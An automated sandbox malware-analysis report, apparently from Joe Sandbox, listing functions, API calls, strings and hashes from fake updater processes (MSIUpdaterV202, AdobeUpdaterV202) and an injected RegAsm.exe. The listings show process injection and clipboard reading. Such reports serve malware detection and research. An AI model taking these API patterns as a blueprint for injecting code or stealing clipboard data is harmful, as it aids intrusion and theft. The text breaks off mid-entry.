Source File: 0000000A.00000002.2189339195.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1090000_MSIUpdaterV202.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 70d9d6df955bc4d8352ec9fa396d85fe843949d20cbd7a7f6cff6c95b36912fa
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 20B1F57264024AAFDB60CF68CC80BDA77A9FF88714F158164EA48AB345D770FA418B94

Analysis Process: RegAsm.exePID: 4340, Parent PID: 5012COMMON

Executed Functions

Function 00426450 Relevance: 4.8, APIs: 1, Strings: 1, Instructions: 1291COMMON

Download Yara Rule

Strings

GDEJ, xrefs: 00427250

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: GDEJ
API String ID: 0-1259571530
Opcode ID: f6b05b0f5b3b18c2a37678809432361cdf9cfd7bf639f1ae4580f218d8804aa7
Instruction ID: 9d8f483259980fc78f499511578bc334323c2c61b69059364b182f223e60d921
Opcode Fuzzy Hash: f6b05b0f5b3b18c2a37678809432361cdf9cfd7bf639f1ae4580f218d8804aa7
Instruction Fuzzy Hash: F8C21230604B91CFD325CF28D490762BBE2BF96304F59869EC8DA4B796D738E845CB58

Function 00414F19 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f, xrefs: 00414F3F

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: f
API String ID: 0-1353099487
Opcode ID: 96a827d44d822599d3c057fb1bd8ec557fd5e1409a05e87b463a1f1868a95d76
Instruction ID: 3db40af52cd5cfba5917e550a6c7b2232b3df47b433275b69b226348da4229ed
Opcode Fuzzy Hash: 96a827d44d822599d3c057fb1bd8ec557fd5e1409a05e87b463a1f1868a95d76
Instruction Fuzzy Hash: 4871F1B550C3818FC314CF28C4916AEBBE2AFD5304F188A2EE4D687392D738D985CB46

Function 00436340 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043910C,?,00000006,00120089,?,00000018,?,?,0041468B), ref: 00436366

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 004149B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004149EA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414A1B

Strings

}|s, xrefs: 00414A3B

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: }|s
API String ID: 237503144-1039199241
Opcode ID: a423aaed873f755818b785dd9ceb33cadae5c486f88a487e6a397ba98f2ae9bb
Instruction ID: 8c5cf648e73890f5bfe9a74a7f2d8af43a7cd61e44d7a5fa48d6af44ddd73fda
Opcode Fuzzy Hash: a423aaed873f755818b785dd9ceb33cadae5c486f88a487e6a397ba98f2ae9bb
Instruction Fuzzy Hash: A851BF741083418BD324CF14C891BABB3F6FFC6354F04462DF98A9B292EB74A944CB96

Function 00408B70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 00408BF5

Strings

primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection, xrefs: 00408BB4

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: ExitProcess
String ID: primarily often on modified in or uses the on the play of is that eleet replacements leetspeak, ways other via used resemblance spellings similarity a internet. glyphs of it system or their character reflection
API String ID: 621844428-744483612
Opcode ID: 8edf4afe23398db4720b2835e0512189381ad9e2d251b84cbd8fcb29604ee4a6
Instruction ID: 70bf744a09fd727a259ee1d112b3c9ae749a16f6a6c9cbf4469ea4d0a5ce1dca
Opcode Fuzzy Hash: 8edf4afe23398db4720b2835e0512189381ad9e2d251b84cbd8fcb29604ee4a6
Instruction Fuzzy Hash: AFF081F040D6009AD6103B769F0A26E7AB8AF11358F51053FF9C1762C2EE7C640A97AF

Function 00432566 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNEL32 ref: 004325B7

Strings

\, xrefs: 00432571
C, xrefs: 00432566

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: InformationVolume
String ID: C$\
API String ID: 2039140958-514332402
Opcode ID: 557d3778fd059ab4a24c9647201a82de3bc481e107b38469c0871c14bac291e7
Instruction ID: aa0968976cd407e2889a63f84c42208ae0db2403cf3b2c192a3408e2d997dd9b
Opcode Fuzzy Hash: 557d3778fd059ab4a24c9647201a82de3bc481e107b38469c0871c14bac291e7
Instruction Fuzzy Hash: 66F05EB5418342DBD704EF25D96432EBBE0FF89318F20CA1DF49993250D7749A948F4A

Function 00435B52 Relevance: 1.6, APIs: 1, Instructions: 74
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?), ref: 00435C26

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ad0b27c512a46cb3d6cf93b8b33958ce21f56b0bfbd34c7d62f7fc7cf985dc34
Instruction ID: 0602b03d136d9e284aebdb07781a619c93df0bc4458265ec0546250217cefefc
Opcode Fuzzy Hash: ad0b27c512a46cb3d6cf93b8b33958ce21f56b0bfbd34c7d62f7fc7cf985dc34
Instruction Fuzzy Hash: 7D313A75A10B029FC319CF29DC91626BBF2FF5A304718563DD08687722EB34A851CB58

Function 00435A37 Relevance: 1.6, APIs: 1, Instructions: 60
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(?), ref: 00435ACD

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 14c6295b7095769bf3a54fc7fcdda810c9c6f92bc9cadf11b30daa22102dc3f6
Instruction ID: 1d5776ec028b0a6974c364e7fe12bdbbc675b2445f926a01c41e78e6562ebcf6
Opcode Fuzzy Hash: 14c6295b7095769bf3a54fc7fcdda810c9c6f92bc9cadf11b30daa22102dc3f6
Instruction Fuzzy Hash: 7E21B476505A428BD32DCF29D8A0676B3B3FFDA300729962EC49343790DF34A856CB44

Function 00434282 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00434288

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 56797e244d9c887197993ba65d14fc659f4b145562bf2d0924e46119da718bac
Instruction ID: 47c718e6d64a88bce5eedbe1abd2e314879ed8eefa2e60703a1a38b23230c1f9
Opcode Fuzzy Hash: 56797e244d9c887197993ba65d14fc659f4b145562bf2d0924e46119da718bac
Instruction Fuzzy Hash: 6FD0127D194500DBDB1C8B20DC44F693762FB95305F64C12CE40207263D6719551CA0C

Function 00434436 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 0043443C

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 826516720434e19dabd8178b9a681ec841bc1f3d1258c80d1e4a8917a25e5104
Instruction ID: e3354576a8135b39ec0eef0c659ccbd2581c9bf1dab865f8f636db224e40d6d8
Opcode Fuzzy Hash: 826516720434e19dabd8178b9a681ec841bc1f3d1258c80d1e4a8917a25e5104
Instruction Fuzzy Hash: 9AB09236740109AEDE111F94FC05BEC7B28EB8022BF2000B2E60D960A1D23299679B94

Non-executed Functions

Function 0042D760 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 196COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042D7AB
GetSystemMetrics.USER32 ref: 0042D7BE
DeleteObject.GDI32 ref: 0042D828
SelectObject.GDI32 ref: 0042D87A
SelectObject.GDI32 ref: 0042D8ED
DeleteObject.GDI32 ref: 0042D927

Strings

1G, xrefs: 0042D772, 0042D975, 0042DAAF, 0042DAC0, 0042DAD8, 0042DAF0, 0042DB08, 0042DB20, 0042DB38, 0042DB50, 0042DB68, 0042DB80, 0042DB98, 0042DBB0, 0042DBC8, 0042DBE0, 0042DBF8
1"D, xrefs: 0042DA62
1"D, xrefs: 0042DA99
1"D, xrefs: 0042D9D3
%D, xrefs: 0042D9C8
1"D, xrefs: 0042DA41
v$D, xrefs: 0042DA36
1"D, xrefs: 0042D9FF
1"D, xrefs: 0042D9B2
1"D, xrefs: 0042DA4C
1"D, xrefs: 0042DA0A
, xrefs: 0042D8BC
1"D, xrefs: 0042D9BD

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID: $1"D$1"D$1"D$1"D$1"D$1"D$1"D$1"D$1"D$v$D$%D$1G
API String ID: 3911056724-3040188192
Opcode ID: 5b5127b62be5ad08694142a29e67d50248217d73a3dc84aa0e2d0adb2af5b2ce
Instruction ID: 5526e87088a16d7261bb02d3a6f37ee32a72f65f87bcab9aaa94f5be93fb6608
Opcode Fuzzy Hash: 5b5127b62be5ad08694142a29e67d50248217d73a3dc84aa0e2d0adb2af5b2ce
Instruction Fuzzy Hash: 5CC180B4509380DFE324DF29D58479ABBF0BBC9704F40892EE48987350D7B4A948CF8A

Function 0042D5A0 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 119clipboardCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 0042D5C5
OpenClipboard.USER32 ref: 0042D5DB
GetClipboardData.USER32 ref: 0042D5F4
GlobalLock.KERNEL32 ref: 0042D619
GlobalUnlock.KERNEL32 ref: 0042D73A
CloseClipboard.USER32 ref: 0042D743

Strings

M, xrefs: 0042D659
[, xrefs: 0042D68B
B, xrefs: 0042D66D
@, xrefs: 0042D690
w, xrefs: 0042D672
E, xrefs: 0042D677
^, xrefs: 0042D686
v, xrefs: 0042D668
L, xrefs: 0042D67C
K, xrefs: 0042D663
C, xrefs: 0042D65E

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$K$L$M$[$^$v$w
API String ID: 2832541153-2648654332
Opcode ID: 9e010b7691e6cecf3eea916d399c6891f274b192d43f8d9153076440e7445c15
Instruction ID: fa031fb899673b3b3c8b2c77958664f73088c85f9ebfc9e0d915b09b47a5e334
Opcode Fuzzy Hash: 9e010b7691e6cecf3eea916d399c6891f274b192d43f8d9153076440e7445c15
Instruction Fuzzy Hash: FE51E5B090C3808FD301DF68D44975EBFE0AB99308F444A2EE4D997292D779DA49CB5B

Function 0042D2F0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2244711288.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd85223c53bdbc33de374fa11678d8cc24002f8bc91307d362eec336c8a39dd7
Instruction ID: 68c45ebc5194ef236972f06cc17f1d4fd4e2e5e0e46ab3d52ef1892f10298282
Opcode Fuzzy Hash: fd85223c53bdbc33de374fa11678d8cc24002f8bc91307d362eec336c8a39dd7
Instruction Fuzzy Hash: 8AE0E5B05053008FD314EF28D4A4B56FBE0BF88304F12891EE4AB9B391D7B8A954CB45

Analysis Process: AdobeUpdaterV202.exePID: 6848, Parent PID: 4004COMMON

Non-executed Functions

Function 00EA7596 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00EA78B4,00000002,00000000,?,?,?,00EA78B4,?,00000000), ref: 00EA762F
GetLocaleInfoW.KERNEL32(?,20001004,00EA78B4,00000002,00000000,?,?,?,00EA78B4,?,00000000), ref: 00EA7658
GetACP.KERNEL32(?,?,00EA78B4,?,00000000), ref: 00EA766D

Strings

OCP, xrefs: 00EA75EA
ACP, xrefs: 00EA75B4

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 100be28a33d216be962d576ddf39be0283bb1c11ff52b693bb123eb40b84250b
Instruction ID: 30ab302e0cea297d5704a862d9b9e0eefe54e235907f06efe18418c27819bece
Opcode Fuzzy Hash: 100be28a33d216be962d576ddf39be0283bb1c11ff52b693bb123eb40b84250b
Instruction Fuzzy Hash: 2B219521A08500AADB34CF19CD05BD773A7EF9AB98B569464E98AFF100E732FD41C350

Function 00EA776B Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00E9EA50: GetLastError.KERNEL32(?,00000008,00EA2F56,00000000,00E98E50), ref: 00E9EA54
Part of subcall function 00E9EA50: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 00E9EAF6

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EA7877
IsValidCodePage.KERNEL32(00000000), ref: 00EA78C0
IsValidLocale.KERNEL32(?,00000001), ref: 00EA78CF
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EA7917
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EA7936

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: f0d78630b8292c2b78c93cfb8dcbd1399f003d2d7bc79442b6b0ab7f68b7b50c
Instruction ID: d1066bc1f813f45b51d3cdaca275b2a85df5e28fdf8f1cf616956ad50ab9bf17
Opcode Fuzzy Hash: f0d78630b8292c2b78c93cfb8dcbd1399f003d2d7bc79442b6b0ab7f68b7b50c
Instruction Fuzzy Hash: 8151AD71A04215AFEB14DFA5CC85ABE77B8BF0E300F145429E581FB150EB74A904CB60

Function 00EA6E07 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00E9EA50: GetLastError.KERNEL32(?,00000008,00EA2F56,00000000,00E98E50), ref: 00E9EA54
Part of subcall function 00E9EA50: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF), ref: 00E9EAF6

GetACP.KERNEL32(?,?,?,?,?,?,00E9CA5C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EA6EC8
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00E9CA5C,?,?,?,00000055,?,-00000050,?,?), ref: 00EA6EF3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EA7056

Strings

utf8, xrefs: 00EA6FC5

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: f794de5b02e87bdd7d9d06a5cce964d869aba2c34588bd4213965714a6980fdf
Instruction ID: 8b6b53462f19656ba86964cd8b2b70a144c8888795098cdf0ccaecdc25c39e96
Opcode Fuzzy Hash: f794de5b02e87bdd7d9d06a5cce964d869aba2c34588bd4213965714a6980fdf
Instruction Fuzzy Hash: CC71C275700206AEDB24AF34DC46BAA77E8EF4F708F18642AF505FE581EB74F9408660

Function 00E94D66 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00E94D72
IsDebuggerPresent.KERNEL32 ref: 00E94E3E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E94E57
UnhandledExceptionFilter.KERNEL32(?), ref: 00E94E61

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c90c9d26c5511564ec75fdf80d51741ce405a7e7a49160083a8ec9ea909f92c7
Instruction ID: fcacecbf968194ebf7d998c59bc7e4a1899098b1fc839e5f45e7d303bf55459f
Opcode Fuzzy Hash: c90c9d26c5511564ec75fdf80d51741ce405a7e7a49160083a8ec9ea909f92c7
Instruction Fuzzy Hash: 993107B5D052189ADF21DF64D989BCDBBB8AF08300F1051AAE40DAB290E7719A858F44

Function 00EAC25D Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E910D0: __EH_prolog3_catch.LIBCMT ref: 00E910D7
Part of subcall function 00E910D0: _strlen.LIBCMT ref: 00E910E9

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00EAC285

Part of subcall function 00E9163E: _strlen.LIBCMT ref: 00E91656

_strlen.LIBCMT ref: 00EAC2A0
_strlen.LIBCMT ref: 00EAC2B6
GetProcAddress.KERNEL32(00000000,?,ole,00000000,Cons,00000000,Free), ref: 00EAC2D3

Part of subcall function 00EAC1F7: VirtualAlloc.KERNEL32(00000000,000004AC,00001000,00000040,ole,00000000,?,?,00EAC2E6), ref: 00EAC20B
Part of subcall function 00EAC1F7: CreateThread.KERNEL32(00000000,00000000,00000188,00EB7030,00000000,00000000,?,?,00EAC2E6), ref: 00EAC23F
Part of subcall function 00EAC1F7: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,00EAC2E6), ref: 00EAC24B
Part of subcall function 00EAC1F7: CloseHandle.KERNEL32(00000000,?,?,00EAC2E6), ref: 00EAC252

Part of subcall function 00E91BEA: _Deallocate.LIBCONCRT ref: 00E91BF9

Strings

kernel32.dll, xrefs: 00EAC280
Free, xrefs: 00EAC28B
ole, xrefs: 00EAC2B0, 00EAC2B5, 00EAC2BD
Madino Mino, xrefs: 00EAC26F
Cons, xrefs: 00EAC29A, 00EAC29F, 00EAC2A7

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
String ID: Cons$Free$Madino Mino$kernel32.dll$ole
API String ID: 4115190924-2348686229
Opcode ID: 38a36dfee23a992dc4474ad69c17ab62df18b1a6842da7bdad5d8eb0f07c2e05
Instruction ID: c3519cf0fd71efebbf88634c3a0ce197cdafabd5045aa524cd8769405ea26613
Opcode Fuzzy Hash: 38a36dfee23a992dc4474ad69c17ab62df18b1a6842da7bdad5d8eb0f07c2e05
Instruction Fuzzy Hash: 0E018471E08209AEDF14EBA4DC46CFEB3F8EE9A710710105AF802B6191EE74B906D665

Function 00E97BE8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMON

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00E97D07
___TypeMatch.LIBVCRUNTIME ref: 00E97E15
_UnwindNestedFrames.LIBCMT ref: 00E97F67
CallUnexpected.LIBVCRUNTIME ref: 00E97F82

Strings

csm, xrefs: 00E97D3E
csm, xrefs: 00E97C92
csm, xrefs: 00E97C25

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 98e722e0d01a983d7a1a3cbe0355ed175c9e4e8ca1f00574275b4e66134de1a6
Instruction ID: 762c12f6d874837080efa91a7247b2f99907319de97b1b78c8a6181717cfa205
Opcode Fuzzy Hash: 98e722e0d01a983d7a1a3cbe0355ed175c9e4e8ca1f00574275b4e66134de1a6
Instruction Fuzzy Hash: EEB18A71928209EFCF29DFA4C8819AEBBB5BF04314F146059E8917B212D731EE59CB91

Function 00EA163C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

, xrefs: 00EA18B5

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 4a58cc5ea0f5db8c9aac344eb242e6de801daa37c502630ff08584e64ef76383
Instruction ID: 66c19a5b8186f07b76af97f737ad56503cb0ffd439e31218692ec8f31ef70a80
Opcode Fuzzy Hash: 4a58cc5ea0f5db8c9aac344eb242e6de801daa37c502630ff08584e64ef76383
Instruction Fuzzy Hash: C7B1EF74A04249AFDB15DF98D880BBEBBF5BF8B304F149199E550BF292C770A941CB60

Function 00EA98B9 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,00EA9B89,?,?,?,?,?,?,?,?,?,?), ref: 00EA995F
__alloca_probe_16.LIBCMT ref: 00EA9A1A
__alloca_probe_16.LIBCMT ref: 00EA9AA9
__freea.LIBCMT ref: 00EA9AF4
__freea.LIBCMT ref: 00EA9AFA
__freea.LIBCMT ref: 00EA9B30
__freea.LIBCMT ref: 00EA9B36
__freea.LIBCMT ref: 00EA9B46

Memory Dump Source

Source File: 00000011.00000002.2277970019.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000011.00000002.2277946976.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2277997469.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278030655.0000000000EB7000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000011.00000002.2278120200.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 3d13737a18aebf628d4c639dcbdb4529276d4b4cf6bc1c58b3123418a84efbcf
Instruction ID: d6cccf7f4179006bb7e741b3f9ab6b8a7e253ca18f375fd2d4a0dbc8e547a602
